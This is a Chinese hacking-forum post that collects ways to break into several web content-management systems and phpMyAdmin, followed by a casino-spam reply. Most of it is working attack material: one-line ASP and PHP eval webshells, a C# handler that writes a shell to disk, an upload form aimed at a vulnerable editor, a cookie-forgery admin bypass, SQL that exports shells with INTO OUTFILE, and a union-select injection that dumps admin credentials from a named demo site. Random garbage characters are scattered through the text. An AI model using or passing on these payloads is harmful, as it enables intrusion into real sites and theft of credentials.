登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/% F" N* z- }& U" f6 c
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
. Y& P( U% U5 n0 V4 q: o---------------------------------------------------------------------------------------------------------------------------------------------------------------------------& H$ s* P8 \/ t8 E0 {- e8 \& v6 q
. L; C  C2 V, x( _- Z: }
YxShop易想购物商城4.7.1版本任意文件上传漏洞+ O& }; c0 s' r3 t

1 q+ M/ F/ L% Z' M$ b# Shttp://xxoo.com/controls/fckedit ... aspx/connector.aspx8 W8 N; I  Q, j8 U
跳转到网站根目录上传任意文件。6 M, ~# i8 e: E$ L, C
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
7 m( Z7 v6 V+ h1 u5 a<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
9 }# Y2 j8 Y5 J$ [; L* A% `Upload a new file:<br>
- Q& H6 J( |1 w# A* o3 C- K: P" p<input type="file" name="NewFile" size="50"><br>/ d& n# @5 s% n3 w: h
<input id="btnUpload" type="submit" value="Upload">' |; I' m. O' J* H. }
</form>; G7 N2 U) j3 i& \( B- X" x6 R
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" S; E3 X- u* y+ J9 g" m$ T' [$ d/ `4 }* H: C8 D$ p" A1 s
SDcms 后台拿webshell
6 j2 @6 |% s3 D1 \2 ]; e; d# [' n7 O4 X  P/ B
第一种方法:
( b0 {( ^+ o/ A& q进入后台-->系统管理-->系统设置-->系统设置->网站名称;; i( [- C8 P* L# X8 z5 Y
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx; i2 i/ R) _8 u
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。9 t+ q' C: |, q7 B4 s
第二种方法:; m3 Z0 z: b# t7 q
进入后台-->系统管理-->系统设置-->系统设置->上传设置;  K6 h- q( f9 Q3 R- }! W$ y
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!0 x: H% f" C' b
第三种方法:5 O1 d9 b+ P+ O0 Q8 ^0 M& ^
进入后台-->界面管理-->模板文件管理-->创建文件
. _, {* ~7 p9 `# B文件名写入getshell.ashx, Y$ d) x/ {! q$ Q4 z& b
内容写入下面内容:7 ]: [0 ?: }9 R3 u
/====================复制下面的=========================// v. b; Y. P. s: @3 W
<%@ WebHandler Language="C#" Class="Handler" %>* Y+ y+ }* X0 H; }/ T
using System;
/ G' o4 G: H" z4 s+ x- l( ~6 H; vusing System.Web;6 ~0 k! n) i  V3 o7 N' c2 v
using System.IO;
, x$ s8 r: e8 q0 fpublic class Handler : IHttpHandler {2 Z' k- M2 z4 a& `& J; E
public void ProcessRequest (HttpContext context) {! a7 f4 w" q. q# ]0 g6 Y
context.Response.ContentType = "text/plain";
, c% E% w! f6 U2 I5 z: E$ oStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
  c5 }* {) c; V* O9 h& \, Ffile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");2 d: H6 g, [, H  D
file1.Flush();" z2 b2 ?6 P+ Z/ D. d8 p
file1.Close();1 {- p; v; `/ M$ R+ E- `2 \  k" b
}
( Y7 G+ J% C& `( _2 m& epublic bool IsReusable {
" d# m7 y( l" M9 n8 Nget {, @5 D1 r* {6 z6 s
return false;5 s7 \/ Q& {/ Y) _! ?
}
3 G$ J" s) R% m. [# p  k}8 G# i$ c* e- i) v; C+ H
}
/ E; v: Z. D7 \; k0 z3 K) T8 Z' ?/=============================================/
. O6 a( g( n1 }6 I访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx& ^9 q5 ?- X; M* Q
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
* z) L; ~" X# y6 Q! \: J" F" h-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- g# g3 H1 y' o7 c% c; D
1 `! G$ X" z2 v# l% gESCMS网站管理系统0day
, S* v. m" T6 O" Y2 m$ p# m) f- s1 I
5 t" x2 P/ b2 W1 A: h: G后台登陆验证是通过admin/check.asp实现的' d  d# \1 B7 C1 V- O* A

' q2 q. b4 G2 m. l2 U# k: {首先我们打开http://target.com/admin/es_index.html6 g0 U( d7 U) o; G7 n3 s$ }5 r
然后在COOKIE结尾加上3 @2 I+ x# v# e4 r
; ESCMS$_SP2=ES_admin=st0p;
: g, i' c' E; ]修改,然后刷新
, R2 J1 E3 P# E" [3 L进后台了嘎..
5 H3 H8 ]: j' S3 I- d然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL9 C& {1 }) c1 }
: `* N2 `7 s5 Q. F6 M! c. }
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.  U7 C9 D; q1 m& ^' {
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp+ e- U7 E" o: j6 Q
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..9 C/ T  \) U5 a3 v% i# p1 P( E
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
+ o# m; s! f( W- u------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( C! n/ a$ r8 F! j7 v- W9 p7 _- J9 y0 J7 y& i0 ?
宁志网站管理系统后台无验证漏洞及修复- h7 V, I; @5 ]  Y# ^) M
; Z% @2 f' F8 i3 J
网上搜了一下,好像没有发布.如有雷同纯粹巧合!. A* T8 Q% E7 `* w
官方网站:www.ningzhi.net
" K) P) s& Q; T3 c* D学校网站管理系统 V.2011版本 2 }$ W& W7 {& y0 J' O: ^
http://down.chinaz.com/soft/29943.htm
; w# `, M7 Z( S; M- i) l8 Q其它版本(如:政府版等),自行下载.* U! }* z! X9 E
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~# Q5 ]( _2 ?7 B; ]
login.asp代码如下:! h# B* M& T$ G8 V, h' \/ u
<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> + s3 _& V$ }$ Q5 }9 z! V$ K% `( ~
manage.asp代码我就不帖出来了.反正也没验证.
# H9 r1 e( o6 O/ g/ B( S8 i, t9 G, P只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!% `2 N% L: ]/ ?2 C
漏洞利用:( C. M) {$ F, p+ R0 C) w
直接访问http://www.0855.tv/admin/manage.asp- H- ?) {8 }! `# r* p! v  g
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web50 x8 b% ^$ W% ^  p
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 L* u4 V# x% E, h& {: ]6 M' e9 s9 q$ y1 p  o5 J4 y
phpmyadmin拿shell的四种方法总结及修复
& ]! e) m5 T: P! @
- O% W% y* y& p方法一:
$ O. S" O* R! A3 G0 p1 L: ?! I* pCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
- k. x! k$ b1 I3 Q- v+ f( CINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
% D* w; P8 \* ^" `SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';5 J# J: e, m% Q
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php, m, Y; Q4 M# j) P& m" H2 D
    一句话连接密码:7on2 Z1 y" l- U  P$ U0 j, i. d
方法二:. M) u& P5 B4 f+ S2 ^
读取文件内容:    select load_file('E:/xamp/www/s.php');8 V8 c! e# \) m
写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'( \. D) W0 i0 k; L" o1 z
cmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'7 H% l/ I3 u) ]  X+ O# @/ H6 D
方法三:
  d  }) O0 I) u! N+ H2 X% h- lJhackJ版本 PHPmyadmin拿shell9 b) z) l# m7 z2 A
Create TABLE study (cmd text NOT NULL);
2 Z: h- x# i: h' \; W/ bInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
+ O3 l" _- a; r: Cselect cmd from study into outfile 'E:/wamp/www/7.php';9 @, {0 j+ }$ u( l, l, [  \. ~
Drop TABLE IF EXISTS study;8 Y5 ?( b3 l: [5 b
<?php eval($_POST[cmd])?>
2 z9 [, f# _8 `) A8 l1 L( n/ aCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。* ^$ {$ ^  ]2 ^* ^; J% \
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1% M. B1 H: \% K6 a- r
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1% _; l8 @- j  ]; I6 E5 N, X% X6 H& A" q
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
3 e) @" R3 f; V( ~* u- q& O' @方法四:
* w, Z" w+ ^9 I( d6 g- h7 ^select load_file('E:/xamp/www/study.php');( V; i7 F  q5 `: x4 e6 m6 Z
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'! R9 W, s& {% h. n
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
" b* K" w. k. t-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
  d, r; v, w! o+ I! f) \7 ]$ H4 Z( \& k0 M. w1 r; Q# Z
NO.001中学网站管理系统 Build 110628 注入漏洞& W; ^* o: {% z- N

4 `# \/ N" z8 C+ A+ u7 j6 n4 hNO.001中学网站管理系统功能模块:
( W0 v' i+ o% m4 h/ |% ?6 i! v7 K1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
) n' H: U& f' j! W2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息% g1 s9 ?6 V7 Q" g
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息: x+ F2 K0 r% E0 v; L& t$ D
4.视频图片管理:一级分类,动态添加视频或者图片等信息
/ C" ~" T5 J( c  u0 C- U' C5.留言管理:对留言,修改,删除、回复等管理
$ A) A; B! Y  _% y0 u3 y: a6.校友频道:包括校友资料excel导出、管理等功能* z( d1 d# ?0 K. u
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页! O7 V' U8 z  W, T4 R- b, {
默认后台:admin/login.asp
+ I- b& F3 w5 w0 o4 g官方演示:http://demo.001cms.net
3 a& N+ A! o2 ]. F: a2 d源码下载地址:http://down.chinaz.com/soft/30187.htm& Y6 e- U. o* d8 c3 V
EXP:% S% E) a. \% J6 X0 g% n( Z
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
7 t5 d$ [# [% h+ `测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
( w! E$ N+ N2 X; Ugetshell:后台有备份,你懂的( L3 p1 _& {3 D/ ]
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。/ D* g+ P- C" q( A
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表